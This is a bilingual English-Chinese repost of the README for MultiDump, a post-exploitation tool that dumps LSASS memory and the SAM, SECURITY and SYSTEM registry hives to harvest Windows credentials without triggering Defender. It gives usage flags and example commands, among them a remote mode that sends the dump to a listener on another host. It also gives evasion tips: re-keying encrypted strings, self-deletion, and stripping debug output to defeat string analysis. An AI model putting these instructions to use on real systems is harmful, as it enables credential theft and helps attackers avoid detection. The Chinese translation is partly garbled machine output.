MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
MultiDump 是一个用 C 编写的后期开发工具,用于谨慎地转储和提取 LSASS 内存,而不会触发 Defender 警报,并使用 Python 编写处理程序。
Blog post: https://xre0us.io/posts/multidump
博客文章:https://xre0usio/posts/multidump
MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
MultiDump 支持通过 ProcDump.exe 或 comsvc.dll 进行 LSASS 转储,它提供两种模式:本地模式(在本地加密和存储转储文件)和远程模式(将转储发送到处理程序进行解密和分析)。
Usage 用法
__ __ _ _ _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|
Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]
-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode
MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]
Handler for RemoteProcDump
options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.
与所有 LSASS 相关工具一样,需要 Administrator/SeDebugPrivilege 特权。
The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it’s likely the Pypykatz version is outdated.
处理程序依赖于 Pypykatz 来解析 LSASS 转储,并依靠 impacket 来解析注册表保存。它们应该安装在您的环境中。如果您看到错误 All detection methods failed ,则可能是 Pypykatz 版本已过时。
By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.
默认情况下,MultiDump 使用该 Comsvc.dll 方法并将加密的转储保存在当前目录中。
MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.
如果 --procdump 使用, ProcDump.exe 则将写入磁盘以转储 LSASS。
In remote mode, MultiDump connects to the handler’s listener.
在远程模式下,MultiDump 连接到处理程序的侦听器。
./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler’s IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
密钥使用处理程序的 IP 和端口进行加密。当 MultiDump 通过代理连接时,处理程序应使用 --override-ip 该选项手动指定用于远程模式下密钥生成的 IP 地址,通过将解密 IP 与 MultiDump 中设置的预期 IP 相匹配来确保解密正常工作 -r 。
An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
转储 SAM 和 SECURITY SYSTEM 配置单元的附加选项可用于 --reg ,解密过程与 LSASS 转储相同。这更像是一种便利功能,使漏洞利用后信息收集更容易。
Building MultiDump 构建 MultiDump
Open in Visual Studio, build in Release mode.
在 Visual Studio 中打开,在发布模式下生成。
Customising MultiDump 自定义 MultiDump
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.
建议在编译之前自定义二进制文件,例如更改静态字符串或用于加密它们的 RC4 密钥,为此,包括另一个 Visual Studio 项目 EncryptionHelper 。只需更改键或字符串,编译 EncryptionHelper.exe 后的输出即可粘贴到 MultiDump.c 和 Common.h 中。
Self deletion can be toggled by uncommenting the following line in Common.h:
可以通过取消注释以下 Common.h 行来切换自我删除:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:
为了进一步规避字符串分析,可以通过注释以下行来 Debug.h 排除大多数输出消息:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving–lsass–from–defender/
MultiDump 可能会在 Windows 10 22H2 (19045) 上被检测到(某种程度上),并且我已经为它实施了修复程序(某种程度上),调查和实现本身值得一篇博文:https://xre0usio/posts/saving-lsass-from-defender/
Credits 学分
- Some techniques used learnt from MalDev Academy, it is an awesome course, highly recommended
从MalDev学院学到的一些技术,这是一门很棒的课程,强烈推荐 - Inspired by proc_noprocdump
灵感来自proc_noprocdump - Code to further process LSASS dump from lsassy
用于进一步处理 lsassy 的 LSASS 转储的代码 - Testing and suggestions from ballro
ballro的测试和建议 - Testing and suggestions from DisplayGFX, nthdeg and silentbee
来自 DisplayGFX、nthdeg 和 silentbee 的测试和建议
原文始发于 FARADAYSEC:MultiDump – Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly
